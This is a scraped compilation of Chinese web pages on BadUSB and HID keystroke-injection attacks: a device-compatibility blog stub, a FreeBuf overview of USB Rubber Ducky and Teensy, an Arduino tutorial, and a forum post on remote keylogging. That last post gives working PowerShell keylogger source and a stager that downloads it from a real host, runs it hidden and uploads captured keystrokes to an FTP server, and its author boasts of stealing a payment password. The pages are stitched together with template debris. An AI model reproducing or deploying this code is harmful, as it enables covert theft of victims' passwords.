温馨提示！由于新浪微博认证机制调整，您的新浪微博帐号绑定已过期，请重新绑定！&&|&&
K8搞基大队队长 专注于被妞泡
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
阅读(6738)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
在LOFTER的更多文章
loftPermalink:'',
id:'fks_',
blogTitle:'[硬件]BadUSB支持的U盘型号列表',
blogAbstract:'BadUSB支持的U盘型号列表 注:需USB3支持 且买到指定型号的U盘用的主控型号也不一定是PS2251-03所以大家别浪费钱了,没事还是玩玩Teensy吧https://github.com/adamcaudill/Psychson/wiki/Known-Supported-DevicesBased on user feedback, the following devices are known to work with this code:&&& Patriot 8GB Supersonic
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人：
{list a as x}
{if !!b&&b.length>0}
他们还推荐了：
{list b as y}
转载记录：
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}BadUSB的前世今生：USB RUBBER DUCKY和Teensy USB - FreeBuf互联网安全新媒体平台 | 关注黑客与极客
BadUSB的前世今生：USB RUBBER DUCKY和Teensy USB
共846931人围观
，发现 26 个不明物体
前段时间翻译了有关BadUSB的两篇文章和，大家反应强烈，很多人都在打听BadUSB的实现方法，或者从那里可以买到这样的U盘。原本打算本周写一篇分析已公开的BadUSB利用代码，兑现一下诺言，但实在是抽不出时间。在此先给大家介绍一下BadUSB的“老前辈”：USB RUBBER DUCKY和Teensy，满足一下大家的好奇心。USB RUBBER DUCKY和Teensy都可用于实施HID模拟攻击，其中USB RUBBER DUCKY入手简单，傻瓜式操作，但价格不菲啊；而Teensy USB性价比比较高，也可用来制作各种酷炫的DIY。
二、USB RUBBER DUCKY（USB 橡皮鸭）
USB RUBBER DUCKY（USB 橡皮鸭）是最早的按键注入工具。自2010年以来，USB橡皮鸭就一直深受黑客、渗透测试人员以及IT专家的欢迎。USB 橡皮鸭最初作为一个IT自动化的POC，通过嵌入式开发板实现的，后来它发展成为一个成熟的商业化按键注入攻击平台。USB橡皮鸭通过简单的脚本语言、强大的硬件以及出色的伪装成功地俘获了黑客的“芳心”。（谁能想到这么可爱的大黄鸭却暗藏杀机）
不管是笔记本、台式机、平板以及智能手机，几乎每个计算机都通过键盘获得输入。这就是为什么会有一个无处不在的USB标准HID（人机接口设备）。任何一个宣称是键盘HID的设备都能够被大多数操作系统自动的探测和接入。不管它是Windows、Mac或Android系统，键盘就是老大。
Freebuf小科普
HID（Human&Interface&Device）人机接口设备类别是Windows最早支持的USB类别。由其名称可以了解HID设备是计算机直接与人交互的设备，例如键盘、鼠标和游戏杆等。不过HID设备不一定要有人机接口，只要符合HID类别规范，就都是HID设备。
USB橡皮鸭的名字和背后的原理都源自美国一句俗语“ If it looks like a duck,quacks like a duck and walks like a duck,it's a duck”（意思就是如果走路和叫声都像鸭子,那就是鸭子）。人类使用键盘，而计算机相信人类，进而推论出计算机相信键盘。结合计算机对键盘的固有信任和速度超过1000字/分钟的通过脚本模拟的按键操作，传统的安全对策都能够被USB橡皮鸭轻易的绕过，即HID模拟攻击。
1).简单易用的脚本语言
USB 橡皮鸭所使用的脚本语言Duckyscript简单易用，编写payload并不需要任何编程经验。而且现支持在线定制Payload：。只需要简单的三个步骤，就可以创建功能强大的Payload：
USB 橡皮鸭已有的Payload模块如下表所示：
2).功能强大的定制硬件
USB 橡皮鸭使用自定制的硬件设备，具有更大的处理能力和功能性多样化，硬件当然是收费的——39.99$。
硬件特点：
①快速的60MHZ 32位处理器
②便捷的Type A USB连接器
③可通过Micro SD卡扩展内存
④隐藏在不起眼的外壳中
⑤内置载荷重按钮
3).跨平台特性
不管是Windows、Linux、Mac还是Android（当然是不算触摸屏了），各个系统平台所遵守的USB标准都是一致的。所以USB RUBBER DUCKY自然而然就具有了跨平台的特点。
4).活跃的交流社区
USB RUBBER DUCKY拥有自己社区版固件、编码器以及工具箱，具有良好的交流沟通平台：
3.攻击测试步骤
①下载网站生成的inject.bin载荷文件；
②把文件microSD卡的根目录；
③把microSD卡插入到USB橡皮鸭
④在USB橡皮鸭插入到目标系统中
⑤当看到命令提示窗口时，移除USB橡皮鸭；
三、Teensy USB
Teensy是一套完整的基于USB微控制器的开发系统，在占用极少资源的情况下可以实现多种多样的项目。所有的编程都是通过USB端口进行的。不需要特殊的编程器，只需要一个标准的Mini-B USB线缆、一台带有USB口的PC机或Macintosh机。
主要特点：
①可以变身为任意类型的设备
②AVR处理器，16 MHz
③单按钮编程
④易于使用的Teensy Loader应用程序
⑤免费软件开发工具
⑥兼容Mac OS X，Linux和Windows
⑦便携,许多项目的完美支持
⑧使用标签面包板
⑨非常低的成本
你可能问我Teensy能干什么？我会说，你应该问我Teensy不能干什么！，装X必备的神器之一。
关于Teensy如何实现HID模拟攻击，我就不贴具体内容了，详情大家可以查看一下文章：
HID（Human Interface Devices）攻击当前不流行，但是攻击方式很新颖，实用性很高，危险系数应该还是比较高的，值得研究。BadUSB公布的利用代码借鉴了以上两个项目中的一些思路，但这两个项目和BadUSB还是有比较大的区别：
①USB RUBBER DUCKY和Teensy都需要定制的硬件设备，通用性差，而BadUSB针对的是通用的USB设备；
②USB RUBBER DUCKY和Teensy不能够自动复制传播，仅实现了从USB设备-&计算机的单向感染途径，缺少计算机-&USB设备的感染途径，仅适用于定点攻击（Targeted&attack），危害程度大大削弱；
③USB RUBBER DUCKY和Teensy可以实现HID模拟攻击，尚未实现插入恶意代码的功能；
参考链接：
1.USB Rubber Ducky主页：
2.Teensy USB Development Board：
3.一个U盘黑掉你：HID攻击之TEENSY实战：
4.Teensy HID新型攻击方式（Kautilya渗透测试套件）
[原文作者Rabbit_Run，喜欢文章请点赞鼓励。转载请注明来自FreeBuf.COM。免责声明：以上介绍的技术仅作为测试验证目的]
@Rabbit_Run
哥们这么好说话人又这么谦虚,搞个基吧
老师，我想拷一下这个ppt，于是乎又一波艳照门出现。。。
Teensy在某宝买也要200+，而且没有专用外壳，让人一看就知道是芯片。。。。。。
初心易得 始终难守
@whale 再去淘个壳子呗~~~
我有大量ps2303芯片优盘，且测试badusb成功，要买吗，如果要买，请联系我，Email：
必须您当前尚未登录。
必须（保密）
初心易得 始终难守
关注我们 分享每日精选文章
可以给我们打个分吗？BadUSB不久前，有小伙伴在实验室捡到一个U盘，想看看是谁的就插在了自己的电脑上，结果出现了安全软件的报毒通知……也是因为这件事有了制作一个BadUSB的想法，可以在不被杀毒软件发现的情况下进行一些操作。一、前期准备Arduino：这里使用的是BS Micro pro micro leonardoArduino开发板。ArduinoIDE：二、原理BadUSB插入后会模拟键盘、鼠标对电脑进行操作，通过这些操作可以打开CMD或者Powershell并输入命令，通过这些命令可以进行简单操作或者更深一步从服务器下载文件执行。通过下载的.exe及.ps1等文件可以实现信息窃取、发送邮件等，从而达到控制目标机或者窃取信息等目的。三、过程(1)实现弹窗关键代码：Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r');Keyboard.print("mshta vbscript:msgbox(\"lalala\",64,\"lalalatitle\")(window.close)");Keyboard.press(KEY_RETURN); 效果：弹窗.mp4(2)关闭所有窗口关键代码：Keyboard.press(KEY_LEFT_ALT);Keyboard.press(KEY_F4); Keyboard.press(KEY_RETURN);效果:关闭窗口.mp4正常情况下是Alt+F4循环使用的效果是关闭所有窗口，但很大概率会出现自动关机的状况……关机.mp4(3)从服务器端下载文件关键代码：Keyboard.press(KEY_LEFT_CTRL);Keyboard.press(KEY_ESC);Keyboard.releaseAll();Keyboard.print("powershell");Keyboard.press(KEY_RETURN);Keyboard.print("(new-objectSystem.Net.WebClient).DownloadFile('http://www.example.com/example.html','d:lalala.html')");效果：下载文件.mp4这里只是下载了一个命名为lalala.html的文件，如果下载一个可执行文件或者Powershell脚本可以做到更多的事！因为BadUSB模仿的是键盘、鼠标操作，所以常规的安全软件、杀毒软件不能起作用，当然防范起来也很简单：只要不让不受你信任的USB插入你心爱的电脑就不存在安全问题。但是好奇心驱使下还是有很多人会将“捡到”的U盘插入自己的电脑看看是谁的U盘、里面有什么文件。看到这篇文章之后要对来路不明的USB设备多一点防备了。11 条评论分享收藏文章被以下专栏收录网络安全通是国内唯一聚焦网络空间安全终身教育全过程的专业在线学堂服务平台，超过100门课程，超过3000个课时。团队由顶尖网络安全专家、资深IT教育行家、志向远大的小白帽等专业人士组成，旨在为青少年健康成长树立正确的网络安全观，为网络强国建设提高全民科普素养并增强网络安全风险意识，为网络安全学科专业人才培养与职业技能培训提供开放式在线学习生态环境。对文章打分
DerbyCon：BadUSB代码已曝光 USB设备已不再安全
阅读 (63557) 评论 (0)
阅读 (30352) 评论 (12)
阅读 (27264) 评论 (1)
阅读 (64078) 评论 (0)
阅读 (39334) 评论 (2)
阅读 (36473) 评论 (28)
Advertisment ad adsense googles cpro.baidu.com【原创】利用BadUsb实现远程键盘记录
我的图书馆
【原创】利用BadUsb实现远程键盘记录
《利用BadUsb实现远程键盘记录》
[永久绕过杀软，绕过UAC，绕过防火墙，绕不过LZ直播吃翔,吃翔,吃翔!!!]在线演示视频:
清晰版演示视频:&-下载下来看才清晰
0×01 引言& && && && && && && &前段时间看到吾爱上有个支X宝被黑的案例，所以这里我对支X宝的密码登陆框进行了一个键盘记录测试，结果没想到居然成功得到密码!!!
0×02 关于HID& && && && && && && &HID是Human Interface Device的缩写，由其名称可以了解HID设备是直接与人交互的设备，例如键盘、鼠标与游戏杆等。不过HID设备并不一定要有人机接口，只要符合HID类别规范的设备都是HID设备。一般来讲针对HID的攻击主要集中在键盘鼠标上，因为只要控制了用户键盘，基本上就等于控制了用户的电脑。
0×03 准备工具& && && && && && &&&1.一个Badusb& && && && && && &&&2.一个Ftp服务器(随便申请个免费空间就可以)
& && &0×04 代码部分(以下代码可能具有攻击性,请勿用于非法用途)<font color="#.[log.ps1](实时键盘记录并保存为log.txt)本帖隐藏的内容[Asm] 纯文本查看 复制代码Add-Type -TypeDefinition @"
using System.IO;
using System.D
using System.Runtime.InteropS
using System.Windows.F
namespace KeyLogger {
&&public static class Program {
&&private const int WH_KEYBOARD_LL = 13;
&&private const int WM_KEYDOWN = 0x0100;
&&private const string logFileName = "log.txt";
&&private static StreamWriter logF
&&private static HookProc hookProc = HookC
&&private static IntPtr hookId = IntPtr.Z
&&public static void Main() {
& & logFile = File.AppendText(logFileName);
& & logFile.AutoFlush =
& & hookId = SetHook(hookProc);
& & Application.Run();
& & UnhookWindowsHookEx(hookId);
&&private static IntPtr SetHook(HookProc hookProc) {
& & IntPtr moduleHandle = GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName);
& & return SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, moduleHandle, 0);
&&private delegate IntPtr HookProc(int nCode, IntPtr wParam, IntPtr lParam);
&&private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam) {
& & if (nCode &= 0 && wParam == (IntPtr)WM_KEYDOWN) {
& & int vkCode = Marshal.ReadInt32(lParam);
& & logFile.WriteLine((Keys)vkCode);
& & return CallNextHookEx(hookId, nCode, wParam, lParam);
&&[DllImport("user32.dll")]
&&private static extern IntPtr SetWindowsHookEx(int idHook, HookProc lpfn, IntPtr hMod, uint dwThreadId);
&&[DllImport("user32.dll")]
&&private static extern bool UnhookWindowsHookEx(IntPtr hhk);
&&[DllImport("user32.dll")]
&&private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
&&[DllImport("kernel32.dll")]
&&private static extern IntPtr GetModuleHandle(string lpModuleName);
" -ReferencedAssemblies System.Windows.Forms
[KeyLogger.Program]::Main();
<font color="#.[get.ps1](每5秒自动上传键盘记录到FTP服务器)本帖隐藏的内容[Asm] 纯文本查看 复制代码reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f;
cd c:\users\public\
(New-object System.Net.WebClient).DownloadFile('http://fq.wc.lt/up/.ps1','c:\users\public\log.ps1');
start-process -FilePath powershell "-w hidden ./log.ps1"
$log=$env:COMPUTERNAME
while($z=1){
Start-Sleep -Seconds 5
Copy-Item ./log.txt ./GetLog-$log.txt
$fileinf=New-Object System.Io.FileInfo("c:\users\public\GetLog-$log.txt");
$ftp = [System.Net.FtpWebRequest] [System.Net.FtpWebRequest]::Create("ftp://ftp服务器IP/"+$fileinf.name)
$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
$ftp.Credentials = new-object System.Net.NetworkCredential("用户名","密码")
$ftp.UseBinary = $true
$ftp.UsePassive = $true
$content = [System.IO.File]::ReadAllBytes($fileInf.fullname)
$ftp.ContentLength = $content.Length
$rs = $ftp.GetRequestStream()
$rs.Write($content, 0, $content.Length)
$rs.Close()
$rs.Dispose()
(2.08 KB, 下载次数: 12, 售价: 3 CB吾爱币)
&-有土豪的气息屌丝通道本帖隐藏的内容
&-有屌丝的气息
更多LZ原创【原创】利用Badusb窃取Wifi明文密码:【原创首发】ID_Enum身份证穷举破解工具:【原创】如何用Badusb快速窃取资料:【原创'已更新'】利用BadUsb5秒内黑掉一台电脑:【原创】利用"猎豹wifi"钓取"路由器"密码:【视频】记一次GSM手机短信窃听经验分享:【原创】巧用beini强制钓取wifi密码:【原创】记一次GSM手机短信监听经验分享:【原创】优盘资料窃取神器【最新3.2.0版】:【原创】学生端杀手,攻击教师机,学生必备：【解除/破解冰点还原工具】AntiDeepFreeze:【然并卵】QQ登录状态监听器：【然并卵】MD5加密工具：
馆藏&123876
TA的最新馆藏
喜欢该文的人也喜欢}